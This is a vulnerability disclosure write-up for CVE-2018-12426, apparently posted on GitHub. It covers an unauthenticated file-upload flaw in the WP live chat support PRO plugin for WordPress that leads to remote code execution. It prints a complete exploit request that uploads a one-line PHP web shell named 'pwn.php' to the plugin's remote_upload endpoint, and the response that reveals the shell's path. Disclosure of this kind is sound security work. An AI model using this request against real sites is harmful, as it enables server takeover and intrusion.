Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
write-ups/CVE-2018-12426/
write-ups/CVE-2018-12426/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2018-12426

[Suggested description]

 The WP live chat support PRO plugin before 8.0.07 for WordPress is
 vulnerable to unauthenticated Remote Code Execution due to
 client-side validation of allowed file types, as demonstrated by a
 v1/remote_upload request with a .php filename and the image/jpeg
 content type.

[Additional Information]

 The following request was used to upload malicious files to the server:

 POST /wp-json/wp_live_chat_support/v1/remote_upload HTTP/1.1
 Host: localhost:8000
 Cookie: wp-settings-1=mfold%3Do%26imgsize%3Dfull%26libraryContent%3Dbrowse; wp-settings-time-1=1523622040; wplc_chat_status=5; 

  ... 7109443162421071041760069510
 Content-Disposition: form-data; name="file"; filename="pwn.php"
 Content-Type: image/jpeg

 <?php echo system($_GET["CMD"]); ?

  ... 7109443162421071041760069510
 Content-Disposition: form-data; name="timestamp"

 1528969272366
  ... 7109443162421071041760069510--

 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////

 The Response shows the file path where the file has been stored:

 HTTP/1.1 200 OK

 {"response":"http:\/\/localhost:8000\/wp-content\/uploads\/wp_live_chat\/\/pwn.php"}

[Vulnerability Type]

Insecure file-upload / Remote code execution

[Vendor of Product]

CodeCabin_ / WP-livechat

[Affected Product Code Base]

WP live chat support - PRO - All versions < 8.0.07

[Affected Component]

 WP live chat support PRO - all versions < 8.0.07

[Attack Type]

Remote

[Impact Code execution]

true

[Attack Vectors]

 The affected versions of WP live chat support PRO allow
 unauthenticated users to upload files through the chat window. The
 allowed file types (extensions) are validated by means of client side
 constraints. An attacker that submits a POST request directly to the
 endpoint which is responsible for the file-upload is able to bypass
 the client-side constraints and upload malicious files to the target
 server.

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Riccardo ten Cate

[Reference]

https://github.com/RiieCco/write-ups/tree/master/CVE-2018-12426